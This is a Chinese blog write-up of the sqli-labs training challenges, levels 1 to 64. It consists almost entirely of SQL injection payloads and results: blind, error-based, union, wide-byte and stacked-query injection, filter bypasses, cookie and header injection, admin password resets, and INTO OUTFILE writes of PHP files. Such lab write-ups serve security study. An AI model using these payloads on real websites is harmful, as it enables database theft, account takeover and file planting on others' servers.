欢迎光临散文网 会员登陆 & 注册

sql-lab通关

2023-08-04 13:57 作者:笨蛋灬你变了  | 我要投稿

less-1

?id=1'

单引号报错,有回显信息,无限制

?id=1' and '1'='2 页面有不同,字符型

less-2

?id=1'

单引号报错,有回显信息,页面有不同,无限制

?id=1 and 1=2 页面有不同,数字型

less-3

?id=1'

单引号报错,有回显信息,页面有不同,无限制

?id=1') and ('1')=('2 页面有不同,单引号+括号

less-4

?id=1"

双引号报错,有回显信息,页面有不同,无限制

?id=1") and ("1")=("2 页面有不同,双引号+括号

less-5

?id=1'

单引号报错,无回显信息,无限制

?id=1' and '1'='2 页面有不同,字符型

无回显信息,可以使用时间盲注

?id=1' and sleep(5) --+
?id=1' and if(1=1,sleep(5),1) --+
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
#ascii表 A-z 65-122   database()=security


返回错误信息,可以使用双注入查询、报错注入

#双注入
select 1,count(*),floor(rand(0)*2) as bd from information_schema.tables group by bd
select 1,count(*),concat((select database()),':',floor(rand(0)*2)) as bd from information_schema.tables group by bd
#报错注入1
select 1,2,extractvalue(1,concat(0x7e,database()))
?id=1' union select 1,2,extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 50,1))) --+
#报错注入2
select 1,2,updatexml(1,concat(0x7e,database()),1) --+
?id=1' union select 1,2,updatexml(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1)),1) --+

less-6

?id=1"

双引号报错,无回显信息,无限制

类似less-5

less-7

?id=1'

单引号报错,无回显信息,无限制,use outfile(写入文件)

into outfile()

?id=-1')) union select 1,'<?php phpinfo() ?>',3 into outfile "/var/www/html/Less-7/test.php"--+
#虽然会报错,但是文件已经写入进去了
#进行访问
/test.php

  1. 目录有写入权限

  2. 绝对路径

less-8

?id=1'

单引号出现页面变化,无回显,无限制

?id=1' and length(database())=8--+
?id=1' and ascii(substr(database(),1,1))=115--+
#database()=security

使用盲注进行爆破

less-9

?id=1

无论id后面添加任何值页面都无反应

尝试时间盲注:单引号

?id=1' and sleep(5)--+
?id=1' and if (ascii(substr(database(),1,1))=115,sleep(5),1)--+

less-10

?id=1

无论id后面添加任何值页面都无反应

尝试时间盲注:双引号

?id=1" and sleep(5)--+
?id=1" and if (ascii(substr(database(),1,1))=115,sleep(5),1)--+

less-11

页面是一个提交框:post请求

  1. username:1 password:1 页面无反应

  2. username:1' password:1 页面报错

  3. username:1' union select 1,2 # password: 有回显,无限制

  4. username:1' union select 1,table_schema from information_schema.tables # password: 有回显,无限制

less-12

页面是一个提交框:post请求

  1. username:1 password:1 页面无反应

  2. username:1" password:1 页面报错

less-13

页面是一个提交框:post请求

  1. username:1 password:1 页面无反应

  2. username:1' password:1 页面报错:根据报错显示推测:为: ')

  3. username:1')union select 1,2# password:1 页面显示成功登录,无回显,无限制(登录成功是因为union后面语句执行使得username=1,password=2)

  4. username:admin')  # password: 页面显示成功登录,无回显,无限制(登录成功是因为存在admin这个账户,#绕过密码登录)

  5. username:admin') and length(database())=8 # password: 布尔盲注

less-14

页面是一个提交框:post请求

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:1") password:1

    页面报错:推测为双引号

  3. username:admin" # password:1 登录成功

  4. username:admin“ and length(database())=8 # password: 布尔盲注

less-15

页面是一个提交框:post请求

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:admin' # password:1 登录成功

  3. username:admin' and length(database())=8 # password: 登录成功,布尔盲注

  4. username:admin' and ascii(substr(database(),1,1))=115# password: 登录成功,布尔盲注

less-16

页面是一个提交框:post请求

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:admin") # password:1 登录成功

  3. username:admin") and length(database())=8 # password: 登录成功,布尔盲注

less-17

页面显示密码重置,Dhakkan: UPDATE user SET password=xxx WHERE username=xxx

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:Dhakkan password:1 成功修改密码

  3. username:Dhakkan’ password:1 登录失败,其余无反应,无回显,无限制

  4. username:Dhakkan password:1‘ 成功修改密码,报错

  5. username:Dhakkan password:1“ 成功修改密码

  6. username:Dhakkan password:1' and sleep(5)# 成功修改密码,并延时。但是不是5秒(因为update更新中有where条件限制了用户为Dhakkan,但是进行时间盲注时的#将where条件注释了,导致将数据库中所有的用户的密码都进行了更改,所以延迟时间为数据库中的用户数X5)

  7. username:Dhakkan password:报错注入 1' and extractvalue(1,concat(0x7e,database()))# 1' and updatexml(1,concat(0x7e,database()),1)# 1' and (select 1,count(),concat(floor(rand(0)2),database()) as bd from information_schema.schemata group by bd)#(子查询=双注入查询)        Operand should contain 1 column(s) 1' and (select 1 from (select 1,count(),concat(floor(rand(0)2),database()) as bd from information_schema.schemata group by bd)bd2)#(from中的子查询=派生表)(select用union,update、delete、insert用or/and)

less-18

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:admin password:0(正确的账号密码) 登录成功,有回显:user agent

  3. bp抓包:修改:User-Agent: ' 登录成功,报错

  4. bp抓包:修改:User-Agent: '’ 登录成功(insert into 表名(1,2,3)值('UA','IP','username'))

  5. bp抓包:修改:User-Agent:'and database() and' 登录成功,但是database()被原样输出,没有被执行(sleep(5)也不行),尝试报错注入

  6. bp抓包:修改:User-Agent: 'and extractvalue(1,concat(0x7e,database())) and' 'and updatexml(1,concat(0x7e,database()),1) and' 'and (select 1 from(select count(),concat(database(),floor(rand(0)2)) as bd from information_schema.schemata group by bd)bd2) and'

less-19

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:admin password:0(正确的账号密码) 登录成功,有回显:referer

  3. bp抓包:修改:Referer: ' 登录成功,报错

  4. bp抓包:修改:Referer: '’ 登录成功(insert into 表名(1,2,3)值('UA','IP','username'))

  5. bp抓包:修改:Referer: 'and database() and' 登录成功,但是database()被原样输出,没有被执行(sleep(5)也不行),尝试报错注入

  6. bp抓包:修改:Referer: 'and extractvalue(1,concat(0x7e,database())) and' 'and updatexml(1,concat(0x7e,database()),1) and' 'and (select 1 from(select count(),concat(database(),floor(rand(0)2)) as bd from information_schema.schemata group by bd)bd2) and'

less-20

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:admin password:0(正确的账号密码) 登录成功,有回显: user agent ip cookie login name password id

  3. burp抓post请求和get请求两个包,每个修改: ' 直到:get请求的Cookie: uname=admin'; 报错

  4. 修改cookie:uname=admin 'and extractvalue(1,concat(0x7e,database()))# 'and updatexml(1,concat(0x7e,database()),1) # 'and (select 1 from(select count(),concat(database(),floor(rand(0)2)) as bd from information_schema.schemata group by bd)bd2)#

less-21

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:admin password:0(正确的账号密码) 登录成功,有回显: user agent ip cookie login name password id

  3. 发现cookie:YWRtaW4=(admin的base64编码) cookie:YWRtaW4= ' (无变化) cookie:admin ' (报错)

  4. 修改cookie:admin 'and extractvalue(1,concat(0x7e,database()))# 报错,确定闭合为 ')

  5. 修改cookie:admin ')and extractvalue(1,concat(0x7e,database()))# 报错

  6. 修改cookie:YWRtaW4gJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSkpIw==(第五步base64编码)

    YWRtaW4gJylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSksMSkgIw==

    YWRtaW4gJylhbmQgKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdChkYXRhYmFzZSgpLGZsb29yKHJhbmQoMCkqMikpIGFzIGJkIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGdyb3VwIGJ5IGJkKWJkMikj

less-22

  1. username:1 password:1 登录失败,其余无反应,无回显,无限制

  2. username:admin password:0(正确的账号密码) 登录成功,有回显: user agent ip cookie login name password id

  3. 发现cookie:YWRtaW4=(admin的base64编码) cookie:YWRtaW4= ' (无变化)

  4. 使用 ' " ') ')) ") ")) \ / 这些符号修改cookie: admin 'and extractvalue(1,concat(0x7e,database()))#再进行编码

  5. admin "and extractvalue(1,concat(0x7e,database()))#成功 YWRtaW4gImFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkj YWRtaW4gImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSwxKSAj YWRtaW4gImFuZCAoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KGRhdGFiYXNlKCksZmxvb3IocmFuZCgwKSoyKSkgYXMgYmQgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgZ3JvdXAgYnkgYmQpYmQyKSM=

less-23

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 单引号报错

  3. ?id=1' and '1'='1 正常显示 ?id=1' and '1'='2 无回显 表明单引号包裹,字符型,无字符过滤

  4. 根据报错回显构造和 ?id=1' and '1'='1 ?id=1' and length(database())= '1 无回显 ?id=1' and length(database())= '8 回显信息,使用布尔盲注 ?id=1' and length((select table_name from information_schema.tables where table_schema= 'security' limit 0,1))= '1 ?id=1' and length((select table_name from information_schema.tables where table_schema= 'security' limit 0,1))= '6 有回显

less-24

页面存在登录,新用户创建,登录成功后,可修改密码

  1. 分别抓包各页面,并对参数加 ' 测试:无效果

  2. 再注册新用户时,特殊符号不会被过滤,也会写进数据库中,于是尝试二次注入

  3. 新建用户:admin'#/1

  4. 修改新用户密码:admin'#/2

  5. 此时数据库会将 '#特殊符号进行执行,修改的是admin的密码即 admin/2 admin'#/1

less-25

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 单引号报错

  3. ?id=1' and '1'='1 显示:and 和 or被过滤

  4. ?id=1' && '1'='1 && '1'='1内容不被执行

  5. ?id=1' ||  '1'='1(或) ?id=1' ||  '1'='2 执行,但是是 1' 决定式子是否成立,即恒成立 ?id= -1' ||  '1'='1 显示登录信息 ?id= -1' ||  '1'='2 无回显

  6. ?id=-1' || length(database())= '1 无回显 ?id=-1' || length(database())= '8 回显信息,使用布尔盲注

less-26

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 单引号报错

  3. ?id=-1' || length(database())= '1 -1'中的 -被过滤,空格被过滤

  4. ?id=0' || length(database())= '1 无回显 ?id=0' || length(database())= '8 回显信息,使用布尔盲注

  5. 绕过空格

    ?id=0'/**/||/**/length((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema= "security"/**/limit/**/0,1))='6
    #/**/ \ 被过滤(/**/ \t ()、%a0替换空格)
    ?id=0'|| length((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security")))='6
    ?id=0'|| length((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security")))='29
    成功
    #尝试使用报错注入
    ?id=0'||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())))))||'1'='1
    ?id=0'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),1))||'1'='1
    成功

less-27

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 单引号报错

  3. ?id=0' || length(database())= '1 无回显 ?id=0' || length(database())= '8 回显信息,使用布尔盲注

  4. ?id=0'|| length((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security")))='6 union和select被过滤 尝试大小写,复写绕过

  5. ?id=0'|| length((SSELECTELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")))='6 ?id=0'|| length((SSELECTELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")))='29 成功 ?id=0'||(extractvalue(1,concat(0x7e,(SSELECTELECT(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))))||'1'='1 ?id=0'||(updatexml(1,concat(0x7e,(SSELECTELECT(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))||'1'='1

less-28

  1. ?id=0' || length(database())= '1 无回显 ?id=0' || length(database())= '8 回显登录信息,使用布尔盲注

  2. ?id=0'|| length((SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")))='6 ?id=0'|| length((SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")))='29

  3. ?id=0'|| ascii(substr((SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),1,1))='29 无回显 ?id=0'|| ascii(substr((SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),1,1))='101 回显登录信息(e)

less-29

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 单引号报错

  3. ?id=1' and '1'='1 回显登录信息 ?id=1' and '1'='2 无回显

  4. ?id=0' || length(database())= '1 无回显 ?id=0' || length(database())= '8 回显信息,使用布尔盲注

  5. ?id=0' || length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= '6 回显信息

less-30

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 、)、')、)) 回显登录信息 ?id=1" 无回显:猜测为"闭合

  3. ?id=1" and "1"="1 回显登录信息 ?id=1" and "1"="2 无回显

  4. ?id=0" || length(database())= "1 无回显 ?id=0" || length(database())= "8 回显信息,使用布尔盲注

  5. ?id=0" || length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= "6(emails) 回显登录信息

less-31

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1" 报错 ?id=1") 闭合

  3. ?id=1") and ("1")=("1 回显登录信息 ?id=1") and ("1")=("2 无回显

  4. ?id=1") and length(database())=("1 无回显 ?id=1") and length(database())=("8 回显信息,使用布尔盲注

  5. ?id=1") and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= ("6(emails) 回显登录信息

less-32

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 页面显示1\'

  3. 对输入进行转义,尝试宽字节注入 ?id=1%df' 报错

  4. ?id=1%df' and length(database())=1--+ 无回显 ?id=1%df ' and length(database())=8--+ 回显信息,使用布尔盲注

  5. ?id=1%df' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6--+ 回显登录信息

less-33(同32)

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 页面显示1\'

  3. 对输入进行转义,尝试宽字节注入 ?id=1%df' 报错

  4. ?id=1%df' and length(database())=1--+ 无回显 ?id=1%df ' and length(database())=8--+ 回显信息,使用布尔盲注

  5. ?id=1%df' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6--+ 回显登录信息

less-34

  1. username:admin password:0

  2. username:admin' password:0 显示:admin\'

  3. 对输入进行转义,尝试宽字节注入 username:admin%df' password:0 显示:admin%df\'

  4. 报错

    • username:admin�' password:

    • burp抓包输入:admin%df'

  5. username:admin�' and length(database())=1# password: username:admin�' and length(database())=8# password: 无回显

  6. username:admin�' or length(database())=1# password: 无回显 username:admin�' or length(database())=8# password: 回显登录信息

  7. username:admin�' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6# password: 回显登录信息

less-35

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 页面显示1\' 报错

  3. 对输入进行转义,尝试宽字节注入 ?id=1%df' 显示:1�\' 报错

  4. ?id=1 and 1=1 回显登录信息 ?id=1 and 1=2 无回显

  5. ?id=1 and length(database())=1 无回显 ?id=1 and length(database())=8 回显登录信息

  6. ?id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6 回显登录信息

less-36

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 页面显示1\' 回显登录信息

  3. 对输入进行转义,尝试宽字节注入 ?id=1%df' 显示:1�\' 报错

  4. ?id=2%df‘ and 1=1--+ 回显登录信息 ?id=2%df‘ and 1=2--+ 无回显信息

  5. ?id=2%df‘ and length(database())=1--+ 无回显 ?id=2%df‘ and length(database())=8--+ 回显登录信息

  6. ?id=2%df‘ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6--+ 回显登录信息

less-37(同34)

  1. username:admin password:0

  2. username:admin' password:0 显示:admin\'

  3. 对输入进行转义,尝试宽字节注入 username:admin%df' password:0 显示:admin%df\'

  4. 报错

    • username:admin�' password:

    • burp抓包输入:admin%df'

  5. username:admin�' and length(database())=1# password: username:admin�' and length(database())=8# password: 无回显

  6. username:admin�' or length(database())=1# password: 无回显 username:admin�' or length(database())=8# password: 回显登录信息

  7. username:admin�' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6# password: 回显登录信息

less-38

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 报错

  3. ?id=1' and '1'='1 回显登录信息 ?id=1' and '1'='2 无回显

  4. ?id=1' and length(database())=1--+ 无回显 ?id=1' and length(database())=8--+ 回显登录信息

  5. ?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6--+ 回显登录信息

less-39

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1' 报错

  3. ?id=1 and 1=1 回显登录信息 ?id=1 and 1=2 无回显信息

  4. ?id=1 and length(database())=1 无回显 ?id=1 and length(database())=8 回显登录信息

  5. ?id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6 回显登录信息

less-40

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1" 、)、')、)) 回显登录信息 ?id=1' 无回显:猜测为 ' 闭合

  3. ?id=1' and '1'='1 回显登录信息 ?id=1' and '1'='2 无回显

  4. ?id=1' and length(database())= '1 无回显 ?id=1' and length(database())= '8 回显信息,使用布尔盲注

  5. ?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))='6(emails) 回显登录信息

less-41

  1. ?id=1 页面显示: login name:dumb password:0

  2. ?id=1'、"、)、')、")、)) 无回显

  3. ?id=1 and 1=1 回显登录信息 ?id=1 and 1=2 无回显信息

  4. ?id=1 and length(database())=1 无回显 ?id=1 and length(database())=8 回显登录信息

  5. ?id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6 回显登录信息

less-42

页面存在登录,登录成功后,可修改密码

  1. 分别抓包各页面,并对参数加 ' 测试:无效果

  2. 没办法,根据42关的题目为:stacked query(堆叠查询)

  3. 进行堆叠注入 username:admin password:0';update users set password='1' where  username='admin'#(users表是未卜先知了,用于验证此处存在堆叠注入,可以使用creat创建表)

  4. 验证username:admin password:1 成功登录

less-43

  1. 题目stacked query(堆叠查询)

  2. 进行堆叠注入 username:admin password:1';update users set password='2' where  username='admin'# 报错:') 闭合

  3. username:admin password:1');update users set password='2' where  username='admin'#

  4. 验证username:admin password:2 成功登录

less-44

  1. 题目stacked query(堆叠查询)

  2. 进行堆叠注入 username:admin password:2';update users set password='3' where  username='admin'#

  3. 验证username:admin password:3 成功登录

less-45

  1. 题目stacked query(堆叠查询)

  2. 进行堆叠注入 username:admin password:3';update users set password='4' where  username='admin'# 登录失败

  3. username:admin password:3');update users set password='4' where  username='admin'# 盲猜:将:'、"、)、')、")、))。一个个试

  4. 验证username:admin password:4 成功登录

less-46

  1. ?sort=1 页面显示用户列表

  2. ?sort=1' 报错

  3. ?sort=4 页面显示:Unknown column '4' in 'order clause' 推测:select * from security.users order by 1

  4. ?sort=1 desc 页面降序排列,表名此处存在漏洞

  5. ?sort=1 and sleep(1)--+ 18秒,刚好有18个数据,每个1秒

  6. 时间盲注 ?sort=1 and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+ 数据库 ?sort=1 and if (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6,sleep(1),1)--+ 表名长度

  7. 报错注入 ?sort=1 and extractvalue(1,concat(0x7e,database()))--+ ?sort=1 and updatexml(1,concat(0x7e,database()),1)--+ ?sort=1 and (select 1 from (select count(),concat(database(),floor(rand(0)2)) as bd from information_schema.schemata group by bd)bd2)--+(派生表)

  8. 一句话木马 ?sort=1 and (select '<?php phpinfo() ?>') into outfile 'var/www/html/Less-46/test.php' --+ 页面显示:Can't create/write to file '/var/lib/mysql/var/www/html/Less-46/test.php' (Errcode: 2)

  9. ?sort=1 and (select '<?php phpinfo() ?>') into outfile "/var/www/html/Less-46/test.php" --+ 成功写入文件,但是内容中没有phpinfo()

  10. ?sort=1 and (select '<?php phpinfo() ?>') into outfile "/var/www/html/Less-46/test.php" lines terminated by 0x3c3f70687020706870696e666f2829203f3e 写入成功,每行都以<?php phpinfo() ?>结尾 lines terminated by 0x3c3f70687020706870696e666f2829203f3e(每行以十六进制结尾)

  11. http://xxxxxxxxx/Less-46/test.php 访问phpinfo文件

less-47

  1. ?sort=1 页面显示用户列表

  2. ?sort=1' 报错

  3. ?sort=1“、)、2、3、4、5、6、dfsd 页面都显示用户列表

  4. ?sort=1' and sleep(1)--+ 同46,但是再?sort=1加单引号 '

less-48

  1. ?sort=1 页面显示用户列表

  2. ?sort=1'、"、)、2、3、4、5、6、dfsd 无回显

  3. ?sort=1、2、3 页面显示不同排序

  4. 直接盲注 ?sort=1 and sleep(1)--+ ?sort=1 and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+

less-49

  1. ?sort=1 页面显示用户列表

  2. ?sort=1' 无回显

  3. ?sort=1“、)、2、3、4、5、6、dfsd 页面都显示用户列表

  4. ?sort=1' and sleep(1)--+ 同47 ?sort=1' and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+

less-50

  1. ?sort=1 页面显示用户列表

  2. ?sort=1' 报错

  3. ?sort=1、2、3 页面显示不同排序

  4. ?sort=4 页面显示:Unknown column '4' in 'order clause' 推测:select * from security.users order by 1

  5. ?sort=1 desc 页面降序排列,表名此处存在漏洞

  6. 报错注入 ?sort=1 and extractvalue(1,concat(0x7e,database()))--+ ?sort=1 and updatexml(1,concat(0x7e,database()),1)--+ ?sort=1 and (select 1 from (select count(),concat(database(),floor(rand(0)2)) as bd from information_schema.schemata group by bd)bd2)--+(派生表)

  7. 时间盲注 ?sort=1 and sleep(1)--+ ?sort=1 and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+ 数据库 ?sort=1 and if (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6,sleep(1),1)--+ 表名长度

less-51

  1. ?sort=1 页面显示用户列表

  2. ?sort=1' 报错

  3. ?sort=1"、)、2、3、4、5、6、dfsd 页面都显示用户列表

  4. 报错注入

    ?sort=1' and updatexml(1,concat(0x7e,database()),1)--+ ?sort=1' and (select 1 from (select count(),concat(database(),floor(rand(0)2)) as bd from information_schema.schemata group by bd)bd2)--+(派生表)

  5. 时间盲注 ?sort=1' and sleep(1)--+ ?sort=1' and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+ 数据库 ?sort=1' and if (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6,sleep(1),1)--+ 表名长度

less-52

  1. ?sort=1 页面显示用户列表

  2. ?sort=1'、"、)、2、3、4、5、6、dfsd 无回显

  3. 直接盲注 ?sort=1 and sleep(1)--+ ?sort=1 and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+

less-53

  1. ?sort=1 页面显示用户列表

  2. ?sort=1' 无回显

  3. ?sort=1"、)、2、3、4、5、6、dfsd 页面都显示用户列表

  4. 时间盲注 ?sort=1' and sleep(1)--+ ?sort=1' and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+ 数据库 ?sort=1' and if (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6,sleep(1),1)--+ 表名长度

less-54

  1. ?id=1(数据库为:challenges)

  2. ?id=1' 无回显

  3. ?id=-1‘ union select 1,2,3--+

  4. ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ 显示:G84L30CHOC

  5. ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='G84L30CHOC'--+ 显示:id,sessid,secret_1A6W,tryy

  6. ?id=-1' union select 1,2,secret_1A6W from challenges.G84L30CHOC--+ 显示:WJBEHUHFoXEHjhKq4Wnurbdv

less-55

  1. ?id=1 and 1=1 ?id=1 and 1=2 页面变化:显示登录信息

  2. ?id=1) and (1)=(1 ?id=1) and (1)=(2 页面变化:显示登录信息

  3. ?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ 显示:ZJSHM2DQ8C

  4. ?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ZJSHM2DQ8C'--+ 显示:id,sessid,secret_F863,tryy

  5. ?id=-1) union select 1,2,secret_F863 from challenges.ZJSHM2DQ8C--+ 显示:L40AihaqkVCdlw65coL81gv8

less-56

  1. ?id=1')

  2. ?id=1') and ('1')=('1 ?id=1') and ('1')=('2 页面变化:显示登录信息

  3. ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ 显示:KX05DRNQNP

  4. ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='KX05DRNQNP'--+ 显示:id,sessid,secret_KSM0,tryy

  5. ?id=-1') union select 1,2,secret_KSM0 from challenges.KX05DRNQNP--+ 显示:6xPDGoV2DVCaMzWGbnuKf0p2

less-57

  1. ?id=1"

  2. ?id=1" and "1"="1 ?id=1" and "1"="2 页面变化:显示登录信息

  3. ?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ 显示:RJSIGBQM4G

  4. ?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='RJSIGBQM4G'--+ 显示:id,sessid,secret_6FSL,tryy

  5. ?id=-1" union select 1,2,secret_6FSL from challenges.RJSIGBQM4G--+ 显示:PkL01Ui2JbuHfxG9XkR3yc6Q

less-58

  1. ?id=1

  2. ?id=1' 报错

  3. 报错注入 ?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+ 显示:JBIP1R5EMM

  4. ?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='JBIP1R5EMM')),1)--+ 显示:id,sessid,secret_0B7B,tryy

  5. ?id=1' and updatexml(1,concat(0x7e,( select secret_0B7B from challenges.JBIP1R5EMM)),1)--+ 显示:9JwkTrU87NHBBP1JbHLqi6Ja

less-59

  1. ?id=1

  2. ?id=1 and 1=1 ?id=1 and 1=2 页面回显不同

  3. 报错注入 ?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+ 显示:9KYV46AU0T

  4. ?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='9KYV46AU0T')),1)--+ 显示:id,sessid,secret_W9RR,tryy

  5. ?id=1 and updatexml(1,concat(0x7e,( select secret_W9RR from challenges.9KYV46AU0T)),1)--+ 显示:A8Kp6YmTsMFaGouiQuz7Vp0W

less-60

  1. ?id=1" 报错

  2. 报错注入 ?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+ 显示:PJQAGLUUXF

  3. ?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='PJQAGLUUXF')),1)--+ 显示:id,sessid,secret_8GNJ,tryy

  4. ?id=1") and updatexml(1,concat(0x7e,( select secret_8GNJ from challenges.PJQAGLUUXF)),1)--+ 显示:FP4sSmvc9iLmGtNA7pRZqcsQ

less-61

  1. ?id=1' 报错

  2. 报错注入 ?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+ 显示:1PA6G0TRVN

  3. ?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='1PA6G0TRVN')),1)--+ 显示:id,sessid,secret_LVJI,tryy

  4. ?id=1')) and updatexml(1,concat(0x7e,( select secret_LVJI from challenges.1PA6G0TRVN)),1)--+ 显示:jEtrVlDZGr0Rcq1E1nd3gpmE

less-62

  1. 只有单引号不回显

  2. ?id=1') and ('1')=('1 ?id=1') and ('1')=('2 回显页面不同

  3. 盲注 ?id=1') and ascii(substr(database(),1,1))=99 --+ 回显(challenges:c)

  4. ?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=49 --+ 一个个得出table_name=1PA6G0TRVN

  5. ?id=1') and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='1PA6G0TRVN'),1,1))=105 --+ 得出:id,sessid,secret_LVJI,tryy

  6. ?id=1') and ascii(substr((select secret_LVJI from challenges.1PA6G0TRVN),1,1))=106 --+ 得出:jEtrVlDZGr0Rcq1E1nd3gpmE

less-63

  1. ?id=1' 唯一不回显

  2. 盲注 ?id=1' and ascii(substr(database(),1,1))=99 --+ 回显(challenges:c)

  3. ?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=88 --+ 一个个得出table_name=XVCQ5S72H0

  4. ?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='XVCQ5S72H0'),1,1))=105 --+ 得出:id,sessid,secret_IU8C,tryy

  5. ?id=1' and ascii(substr((select secret_IU8C from challenges.XVCQ5S72H0),1,1))=114 --+ 得出:rNlAiMP1PMtH............

less-64

  1. ?id=1 and 1=1 ?id=1 and 1=2 回显不同

  2. ?id=1 and ascii(substr(database(),1,1))=99 回显(challenges:c)

  3. ?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=88 一个个得出table_name=XVCQ5S72H0

  4. ?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='XVCQ5S72H0'),1,1))=105 得出:id,sessid,secret_IU8C,tryy

